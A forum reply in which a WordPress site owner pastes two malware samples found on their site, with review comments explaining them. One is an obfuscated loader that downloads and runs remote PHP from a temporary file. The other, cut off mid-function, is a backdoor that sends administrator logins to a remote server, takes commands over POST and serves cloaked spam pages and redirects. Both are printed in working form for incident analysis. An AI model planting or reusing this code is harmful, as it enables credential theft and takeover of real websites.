Forum Replies Created

  • It does not appear to have been injected into the DB; I never found anything in the SQL that matched the parameters.

    I had to search manually through all the sites and template files to find the damage; the JS was in just one site's ‘main’ folder.

    And this is from my functions.php file:

    // NOTE(review): injected loader, not theme code. In short: it decodes a hidden
    // address, downloads PHP from it, writes that PHP to a temporary dot-file, runs it
    // with include() and deletes the file again. The downloaded code is not part of this
    // snippet, so what it did on this host cannot be determined from here; removing these
    // lines does not undo it.
    // Strings worth searching other files for: '_shaesx_', 'get_data_ya', 'wp_cd',
    // 'wp_frmfunct', 'gogo(.*)enen', and a file named ".default".

    // Hide every PHP error so a failure of the loader never shows on the page.
    @ini_set('display_errors', '0');
    
    error_reporting(0);
    
    global $zeeta;
    
    // Run-once guard: both markers are set at the end of this block.
    if (!$npDcheckClassBgp && !isset($zeeta)) {
    
       // Function names are assembled at run time: '_shaesx_' + 'decode' becomes
       // 'basesx_decode' and then 'base64_decode', so that literal never appears in the
       // file. $ay and $ao hold the names of the two helpers defined below, $algo is the
       // temp-file name suffix, $pass is the encoded blob that is decoded further down.
       $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLIgbQwO4ZdBZv2dPRfXN70cmCWIX7HVoQ==";
    
        
    
    // get_data_ya($m): fetch $m and return the body. Uses file_get_contents() when
    // allow_url_fopen is on, otherwise cURL with an 8 second connect timeout.
    if (!function_exists('get_data_ya')) {
    
        if (ini_get('allow_url_fopen')) {
    
            function get_data_ya($m) {
    
                $data = file_get_contents($m);
    
                return $data;
    
            }
    
        }
    
        else {
    
            function get_data_ya($m) {
    
                $ch = curl_init();
    
                curl_setopt($ch, CURLOPT_HEADER, 0);
    
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    
                curl_setopt($ch, CURLOPT_URL, $m);
    
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
    
                $data = curl_exec($ch);
    
                curl_close($ch);
    
                return $data;
    
            }
    
        }
    
    }
    
    // wp_cd($fd, $fa): XOR $fd with a key stream built from chained sha1() digests of
    // $fa, the stream so far and the constant "wp_frmfunct". The name imitates a
    // WordPress function; it is defined only here.
    if (!function_exists('wp_cd')) {
    
            function wp_cd($fd, $fa="") {
    
                $fe = "wp_frmfunct";
    
                $len = strlen($fd);
    
                $ff = '';
    
                // 8 key-stream bytes per round for inputs over 100 bytes, else 2.
                $n = $len>100 ? 8 : 2;
    
                while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); }
    
                return $fd^$ff;
    
           }
    
    }
    
        
    
        // Resolves to get_data_ya(wp_cd(base64_decode($pass), 'wp_function')): the blob is
        // base64-decoded, XOR-decoded with the key 'wp_function', and the result is used
        // as the address to download from.
        $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    
        // Only the text between the markers "gogo" and "enen" in the response is kept.
        preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    
        // Look for a place where ".default" can be created: each directory under the
        // current working directory, then each of their subdirectories, then the
        // working directory itself.
        $dirs = glob("*", GLOB_ONLYDIR);
    
        foreach ($dirs as $dira) {
    
          if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    
          $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    
          foreach ($subdirs as $subdira) {
    
            if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    
          }
    
        }
    
        if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    
        // The downloaded text is wrapped in PHP open/close tags, written to the dot-file,
        // executed via include() and removed straight away, so the payload is on disk
        // only while it runs and a later file scan will not find it.
        fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    
        fclose($hdl);
    
        include("{$eb}.$algo");
    
        unlink("{$eb}.$algo");
    
    	// Set the run-once markers tested at the top of the block.
    	$npDcheckClassBgp = 'aue';
    
    	$zeeta = "yup";
    
        }
    

    More information: this code was in my template-config.php file and was not detected by the scanner.

    
    // NOTE(review): everything from this line on is injected code, not WordPress or theme
    // code; the paste is cut off before the end of the file. What the visible part does:
    //  - reads the DB_HOST / DB_NAME / DB_USER / DB_PASSWORD constants and works with two
    //    tables of its own, <table prefix>pcachewpr and <table prefix>lcachewpr (prefix
    //    "wpr_" when $table_prefix is empty);
    //  - on a login POST (fields log and pwd) it calls wp_authenticate() itself and, when
    //    the account has the administrator role and level_10, sends the username, the
    //    password, the client IP and the current URL through httpPost() (not visible in
    //    this excerpt) to the address stored in the row wphash='admurl';
    //  - accepts commands as POST fields (trsgdfs, qwydsdf, ptpxcbeiru, redircode,
    //    redirurl, clearcache, editownlinks, getdoorstatus) that create the tables, store
    //    page and keyword data and set redirects; some of that POST and table data is
    //    passed to unserialize();
    //  - during set-up calls delete_metadata('user', 0, 'session_tokens', false, true),
    //    which removes the stored sessions of all users (presumably so that
    //    administrators have to log in again);
    //  - for requests that are not logged in and not under /admin, wp-admin or wp-login
    //    it echoes stored content, injected links or a redirect, chosen by user agent,
    //    referer and IP, and then calls die() - which would explain why a logged-in owner
    //    sees nothing unusual.
    // For clean-up this means: look for the two tables in the database as well as in the
    // files, and treat administrator passwords and the database credentials as exposed.
    // $admworkurl is empty here because the code below removes its value from this file
    // (str_ireplace on the contents of __FILE__) after the first contact with that address.
    $admworkurl="";
    ini_set('display_errors',"Off");ini_set('memory_limit','256M');ini_set('max_execution_time',0);set_time_limit(0);ignore_user_abort(1);$wpdbhost=DB_HOST;$wpdbhost=trim($wpdbhost,":");$wpdbname=DB_NAME;$wpdbuser=DB_USER;$wpdbpass=DB_PASSWORD;if(empty($table_prefix)){$wpdbpref="wpr_";}else{$wpdbpref=$table_prefix;}$maintablaname=$wpdbpref ."pcachewpr";$linkstablaname=$wpdbpref ."lcachewpr";$dbprt="3306";if(stripos("qqq" .$wpdbhost,":")){$wpdbhost=explode(":",$wpdbhost);$dbprt=$wpdbhost[1];$wpdbhost=$wpdbhost[0];}if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}elseif(!empty($_SERVER['REMOTE_ADDR'])){$ip=$_SERVER['REMOTE_ADDR'];}else{$ip="";}$mordaurl=readValueFromBD($wpdbpref ."options","option_value","option_name='siteurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($mordaurl)|| $mordaurl=="no"|| stripos("qqq" .$mordaurl,"localhost")){$mordaurl=$_SERVER['HTTP_HOST'];if(is_ssl()=== false){$mordaurl="https://" .$mordaurl;}else{$mordaurl="https://" .$mordaurl;}}$currenturl=$_SERVER['SERVER_NAME'] .strtolower($_SERVER['REQUEST_URI']);$currenturl=trim($currenturl,"/");if(is_ssl()=== false){$currenturl="https://" .$currenturl;}else{$currenturl="https://" .$currenturl;}$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($admworkurl)&& is_writable(__FILE__)&& $checktable == "no"){$fp1=fopen(__FILE__ ."temp",'w+');if(!$fp1===false){fclose($fp1);$admurltodelete=$admworkurl;$admworkurl=decodeservurl($admworkurl);$params="autoknock=yes&siteurl=" .urlencode($mordaurl);$result=httpPost($admworkurl,$params);$clfile=file_get_contents(__FILE__);$clfile=str_ireplace($admurltodelete,"",$clfile);$fp=fopen(__FILE__,'w+');fwrite($fp,$clfile);fclose($fp);@unlink(__FILE__ ."temp");}}if(!empty($_POST["log"])&&!empty($_POST["pwd"])&& function_exists("wp_authenticate")){$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable != 
"no"){$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=urldecode($admurlfmbd);$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($admurlfmbd)&&!empty($clientidfmbd)&& $clientidfmbd!="no"&& $admurlfmbd!="no"){$un=$_POST["log"];$up=$_POST["pwd"];$auth=wp_authenticate($un,$up);$auth=(array)$auth;if(!empty($auth["ID"])){if(isset($auth["roles"][0])&& $auth["roles"][0]== "administrator"){if(isset($auth["allcaps"]["level_10"])&& $auth["allcaps"]["level_10"]=== true){$params="clientid=" .$clientidfmbd ."&updata=" .urlencode($un ."|||" .$up) ."&admip=" .urlencode($ip) ."&admurl=" .urlencode($currenturl);$result=httpPost($admurlfmbd,$params);}}}}}}if(empty($_GET['ertthndxbcvs'])&&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"/admin")&&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"wp-admin")&&!empty($wpdbhost)&&!empty($wpdbname)&&!empty($wpdbuser)&&!empty($wpdbpass)){header('Content-type: text/html; charset=UTF-8');$currenthash=md5($currenturl);if(!empty($_SERVER['HTTP_USER_AGENT'])){$useragent=$_SERVER['HTTP_USER_AGENT'];}else{$useragent="";}if(!empty($_SERVER['HTTP_REFERER'])){$referer=$_SERVER['HTTP_REFERER'];}else{$referer="";}if(!empty($_POST["trsgdfs"])&& $_POST["trsgdfs"]== "1sxhlichvls"&&!empty($_POST["qwydsdf"])){$err="";$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable == "no"){$res=createTable($maintablaname,"wphash LONGBLOB, wpurl LONGBLOB, wpcache LONGBLOB, wpk LONGBLOB, wpk1 LONGBLOB, wpset LONGBLOB, wpred LONGBLOB, wpredurl LONGBLOB","id",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res != "yes"){echo $res;die();}}elseif($checktable=="udfgoihdkh48sied"){echo $checktable;die();}elseif($checktable=="yes"){echo 
"aawtr35tdgvvcsxdff";die();}$checktable=mysqlTableSeekWP($linkstablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable== "no"){$res=createTable($linkstablaname,"wphash LONGBLOB, wpcache LONGBLOB","id",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res != "yes"){echo $res;die();}}elseif($checktable=="udfgoihdkh48sied"){echo $checktable;die();}elseif($checktable=="yes"){echo "aawtr35tdgvvcsxdff";die();}createIndexBWD($maintablaname,"wphash",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);createIndexBWD($linkstablaname,"wphash",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$postpass=randString("15");$res=insertToBD($maintablaname,"wphash, wpcache","'admurl', '" .urlencode($_POST["qwydsdf"]) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$res=insertToBD($maintablaname,"wphash, wpcache","'passtopost', '" .$postpass ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$clientid=randString("20");$res=insertToBD($maintablaname,"wphash, wpcache","'clientid', '" .$clientid ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res == "yes"){echo "zxcvetrhytdj65re|||||" .$postpass .":::::" .$clientid ."|||||";if(function_exists('delete_metadata')){delete_metadata('user',0,'session_tokens',false,true);}die();}else{echo "xcvbrhr6hdhcgxcva";die();}}if(!empty($_POST["ptpxcbeiru"])){$passtopostfmbd=readValueFromBD($maintablaname,"wpcache","wphash='passtopost'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($passtopostfmbd)|| $passtopostfmbd == "no"|| $passtopostfmbd != $_POST["ptpxcbeiru"]){echo "uewea4sfdxcbxb";die();}if(empty($admurlfmbd)|| $admurlfmbd == "no"){echo "kutyre54aw3eafd";die();}if(empty($clientidfmbd)|| $clientidfmbd == "no"){echo 
"xgse5rsdgiofsdsf";die();}$admurlfmbd=urldecode($admurlfmbd);if(!empty($_POST["hdfgfxoi"])&& $_POST["hdfgfxoi"]== "ncxfxdasdf"&&!empty($_POST["chpuview"])&&!empty($_POST["doorkeys"])){if(getCountofTable($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)>3 && $_POST["firstpart"]=="yes"){deleteLinesFmDB($maintablaname,"wpk IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);deleteLinesFmDB($linkstablaname,"wphash IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}$chpuview=$_POST["chpuview"];$chpuview=urldecode($chpuview);$doorkeys=$_POST["doorkeys"];$doorkeys=urldecode($doorkeys);$doorkeys=stripslashes($doorkeys);$doorkeys=preg_replace_callback('!s:(\d+):"(.*?)";!',function($match){return($match[1]==($match[2]))?$match[0]:'s:' .strlen($match[2]) .':"' .$match[2] .'";';},$doorkeys);$doorkeys=unserialize($doorkeys);if(!is_array($doorkeys)|| count($doorkeys)== 0){echo "vbsdreawefzzdfv";die();}if($_POST["firstpart"]=="yes"){$sitetempfrdoor=parseTemplate();if(empty($sitetempfrdoor)||!is_array($sitetempfrdoor)|| empty($sitetempfrdoor["sitetemp"])|| empty($sitetempfrdoor["chpu"])){echo 
"ktdrtsdfgsdfs4tse";die();}$chpufrdoor=$sitetempfrdoor["chpu"];$sitetempfrdoor=$sitetempfrdoor["sitetemp"];$sitetempfrdoor=str_ireplace("xmlrpc.php","",$sitetempfrdoor);updateBDData($maintablaname,urlencode($chpufrdoor),"wpurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{$chpufrdoor=readValueFromBD($maintablaname,"wpurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$chpufrdoor=urldecode($chpufrdoor);$sitetempfrdoor="notfirstpart";if(empty($chpufrdoor)|| $chpufrdoor=="no"){echo "kiryut7dfgzxvcmcxz";die();}}$doorpagesdata=array();$testpageurl="";foreach($doorkeys as $k=>$onekey){$onekey=explode("|",$onekey);if(!empty($onekey[1])){$key_1=$onekey[1];}else{$key_1="";}$onekey=$onekey[0];if($chpuview == "k"){$slugfrurl=sanitize_title($onekey);}elseif($chpuview == "g"){$slugfrurl=randString(rand(7,11));}elseif($chpuview == "n"){$slugfrurl=rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9);}$slugfrurl=strtolower($slugfrurl);$doorpageurl=str_ireplace("chpukeyplace",$slugfrurl,$chpufrdoor);$doorpagesdata[]=$onekey .":::::" .$doorpageurl;$res=insertToBD($maintablaname,"wphash, wpurl, wpk, wpk1","'" .md5($doorpageurl) ."', '" .urlencode($doorpageurl) ."', '" .urlencode($onekey) ."', '" .urlencode($key_1) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($_POST["firstpart"]=="yes"&& $k==0){$testpageurl=str_ireplace("chpukeyplace","edf8329we",$chpufrdoor);insertToBD($maintablaname,"wphash, wpurl, wpk, wpk1","'" .md5($testpageurl) ."', '" .urlencode($testpageurl) ."', 'edf8329we', ''",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}if($res == "bewiursfer9uidd"){echo "xcvbr459isdfgssdd";die();}}updateBDData($maintablaname,$_POST["doorsetts"],"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$doorpagesdata=serialize($doorpagesdata);$doorpagesdata=urlencode($doorpagesdata);$params="clientid=" .$clientidfmbd ."&newdoordata=" .$doorpagesdata ."&sitetemplate=" 
.urlencode($sitetempfrdoor) ."&firstpart=" .$_POST["firstpart"] ."&testpageurl=" .urlencode($testpageurl);$result=httpPost($admurlfmbd,$params);if(stripos("qqq" .$result,"trugsew9rusxildd")){echo "xbvstrei4w0aeaorpdf";die();}elseif(stripos("qqq" .$result,"bw543ersfdgsdfffg")){echo "pqweity5rer5syc9f";die();}else{echo "myrtersgertsrgfdf";die();}}if(!empty($_POST["redircode"])||!empty($_POST["redirurl"])){if(!empty($_POST["redircode"])){if($_POST["redircode"]=="stop"){updateBDData($maintablaname,"","wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{updateBDData($maintablaname,urlencode(stripslashes($_POST["redircode"])),"wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}if(!empty($_POST["redirurl"])){updateBDData($maintablaname,urlencode(stripslashes($_POST["redirurl"])),"wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}echo "geri9rdgfojvrev";die();}if(!empty($_POST["clearcache"])){updateBDData($maintablaname,"","wpcache","wpcache IS NOT NULL AND wpk IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);deleteLinesFmDB($linkstablaname,"wphash IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);echo "be545hgfxbfbgfdf";die();}if(!empty($_POST["editownlinks"])&&!empty($_POST["newownlinks"])){$doorsettings=readValueFromBD($maintablaname,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($doorsettings)&& $doorsettings!="no"){$doorsettings=urldecode($doorsettings);$doorsettings=unserialize($doorsettings);$doorsettings["ownlinks"]=$_POST["newownlinks"];$doorsettings=serialize($doorsettings);$doorsettings=urlencode($doorsettings);updateBDData($maintablaname,$doorsettings,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);echo "nbvw436rudtydsjjgk";die();}else{echo 
"vcbntrs6udtyradgxf";die();}}if(!empty($_POST["getdoorstatus"])){$doorstatus=getStatus($maintablaname,$linkstablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$botsstats=readValueFromBD($maintablaname,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!is_numeric($botsstats)){$botsstats=0;}$usersstats=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!is_numeric($usersstats)){$usersstats=0;}if(is_array($doorstatus)){$doorstatus["botsstats"]=$botsstats;$doorstatus["usersstats"]=$usersstats;$doorstatus=serialize($doorstatus);$doorstatus=urlencode($doorstatus);echo "p9ot78u6syrtfxhg DOORSTATUS:::" .$doorstatus .":::DOORSTATUSq";die();}else{echo $doorstatus ."<br>";echo "zxcveer4eefresfsdfv";die();}}}$uatobadfilter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Ahrefs#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yanga#i','#Yeti#i','#jeeves#i','#WordPress#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread\srevision#i','#sqworm#i','#infoseek 
sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#charlotte#i','#Vegi\s*bot#i','#BUbiNG#i','#ltx71#i','#MJ12bot#i','#MegaIndex#i','#Mediatoolkitbot#i','#DotBot#i','#opensiteexplorer#i','#Go-http-client#i','#Photon#i','#bloglovin#i','#scalaj-http#i','#AddThis#i','#LinkWalker#i','#adscanner#i','#istellabot#i','#Datanyze#i');$badbot="";if(strpos("qqq" .preg_replace($uatobadfilter,'-ABOT-',$useragent),'-ABOT-')){$badbot="yes";}if(mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)!="no"&& getCountofTable($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)>3 &&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"wp-login")&& is_user_logged_in()===false && empty($badbot)){$reddata=readValueFromBD($maintablaname,"wpred, wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$redcode="";$redurl="";if(!empty($reddata)&& $reddata != "no"){$redcode=$reddata["wpred"];$redurl=$reddata["wpredurl"];}$currentdoorcache=readValueFromBD($maintablaname,"wpcache, wpk","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($currentdoorcache == "no"){$showlinksornot="no";$doorsettings=readValueFromBD($maintablaname,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($doorsettings)&& $doorsettings!="no"){$doorsettings=urldecode($doorsettings);$doorsettings=unserialize($doorsettings);$showlinksornot=$doorsettings["ownlinks"];}if($showlinksornot=="yes"){$currentlinkscache=readValueFromBD($linkstablaname,"wpcache","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($currentlinkscache == "no"|| empty($currentlinkscache)){$randlinks=randomValuesFromTableById($maintablaname,"wpurl,wpk",rand(4,6),$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($randlinks)&& $randlinks != "no"&& is_array($randlinks)){$goodlinks=array();foreach($randlinks as 
$onelinkdata){if(!empty($onelinkdata["wpk"])){$goodlinks[]="<a href=\"" .trim(urldecode($onelinkdata["wpurl"])) ."\">" .trim(urldecode($onelinkdata["wpk"])) ."</a>";}}if(count($goodlinks)>0){$goodlinks=implode(" ",$goodlinks);insertToBD($linkstablaname,"wphash, wpcache","'" .$currenthash ."', '" .urlencode($goodlinks) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{$goodlinks="";}}}else{$goodlinks=urldecode($currentlinkscache);}if(!empty($goodlinks)){$bot="";if($redcode == "ktapi"&&!empty($redurl)){$redurl=urldecode($redurl);$redurl=unserialize($redurl);if(count($redurl)== 3){$bot=goToRedirect($ip,$referer,$useragent,$redurl["kturl"],"",$redurl["lapi"],"yes","","","","");}}else{$bot=goToRedirect($ip,$referer,$useragent,"","","","yes","","","","");}if($bot == "bot"){$selfpage=placeLinks($currenturl,$goodlinks);if(!empty($selfpage)){echo $selfpage;die();}}}}}else{$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($clientidfmbd)&&!empty($admurlfmbd)){$admurlfmbd=urldecode($admurlfmbd);$currentkey=$currentdoorcache["wpk"];$key1frredir=readValueFromBD($maintablaname,"wpk1","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($key1frredir)|| $key1frredir=="no"){$key1frredir="";}$redresult="";if($redcode == "ktapi"&&!empty($redurl)){$redurl=urldecode($redurl);$redurl=unserialize($redurl);if(count($redurl)== 
3){$redresult=goToRedirect($ip,$referer,$useragent,$redurl["kturl"],$currenturl,$redurl["mapi"],"",urldecode($currentkey),"","",$key1frredir);}}elseif(empty($redcode)){$redresult=goToRedirect($ip,$referer,$useragent,"",$currenturl,"","",urldecode($currentkey),"","","");}else{$redcode=urldecode($redcode);$redurl=urldecode($redurl);$redresult=goToRedirect($ip,$referer,$useragent,"",$currenturl,"","",urldecode($currentkey),$redcode,$redurl,$key1frredir);}if(empty($currentdoorcache["wpcache"])|| $currentkey=="edf8329we"){$params="clientid=" .$clientidfmbd ."&givemecontent=" .$currentkey;$content=httpPost($admurlfmbd,$params);if(!empty($content)&& strlen($content)>1000){$content=urlencode($content);if($currentkey!="edf8329we"){updateBDData($maintablaname,$content,"wpcache","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}}else{$content=$currentdoorcache["wpcache"];}if($redresult == "bot"){if(stripos("qqq" .$useragent,"google")|| stripos("qqq" .$useragent,"bing")|| stripos("qqq" .$useragent,"yahoo")|| stripos("qqq" .$useragent,"yandex")){$botscount=readValueFromBD($maintablaname,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($botscount)|| $botscount=="no"){$botscount=1;}elseif(is_numeric($botscount)){$botscount++;}else{$botscount=1;}if(!empty($botscount)){updateBDData($maintablaname,$botscount,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}echo urldecode($content);die();}elseif(!empty($redresult)){if(stripos("qqq" .$referer,"google.")|| stripos("qqq" .$referer,"yahoo.")|| stripos("qqq" .$referer,"bing.")|| stripos("qqq" .$referer,"yandex.ru")|| stripos("qqq" .$referer,"mail.ru")){$userscount=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($userscount)|| $userscount == 
"no"){$userscount=1;}elseif(is_numeric($userscount)){$userscount++;}else{$userscount=1;}if(!empty($userscount)){updateBDData($maintablaname,$userscount,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}echo $redresult;die();}elseif(empty($redresult)){if(stripos("qqq" .$referer,"google.")|| stripos("qqq" .$referer,"yahoo.")|| stripos("qqq" .$referer,"bing.")|| stripos("qqq" .$referer,"yandex.ru")|| stripos("qqq" .$referer,"mail.ru")){$userscount=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($userscount)|| $userscount == "no"){$userscount=1;}else{$userscount++;}if(!empty($userscount)){updateBDData($maintablaname,$userscount,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}}}}}}function decodeservurl($servurl){$goodservurl=array();foreach(str_split($servurl)as $onechar){if(is_numeric($onechar)){if($onechar>=7){$onechar=$onechar-7;}else{$onechar=$onechar+10-7;}}$goodservurl[]=$onechar;}return urldecode(base64_decode(implode($goodservurl)));}function createIndexBWD($tablename,$indcol,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$sql="ALTER TABLE " .$tablename ." ADD INDEX " .$indcol ." 
